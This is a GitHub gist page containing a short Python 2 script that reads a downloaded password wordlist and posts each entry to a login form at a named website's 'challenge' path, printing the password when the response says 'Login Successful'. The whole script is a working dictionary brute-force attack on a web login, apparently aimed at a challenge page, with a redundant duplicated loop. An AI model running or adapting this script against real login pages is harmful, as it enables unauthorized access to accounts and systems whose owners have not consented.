Skip to content

Instantly share code, notes, and snippets.

@0xPwny
Last active February 16, 2016 12:51
Show Gist options
  • Save 0xPwny/d29c074544838895e597 to your computer and use it in GitHub Desktop.
Save 0xPwny/d29c074544838895e597 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
import requests
url = "http://www.orlando-ticket-deals.co.uk/forums/challenge/"
cd = open('/home/crypthon/Downloads/bbc6AzUK.txt').readlines() #http://pastebin.com/bbc6AzUK
for xi in cd:
p = xi.replace('\n','')
o = p.replace('\r','')
for xi in cd:
p = xi.replace('\n','')
o = p.replace('\r','')
data = {"pass":o}
to = requests.post(url, data=data)
pop = to.text
if "Login Successful" in pop:
print "you did it => %s" % o
else:
print 'OHHh >> %s ' % o
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment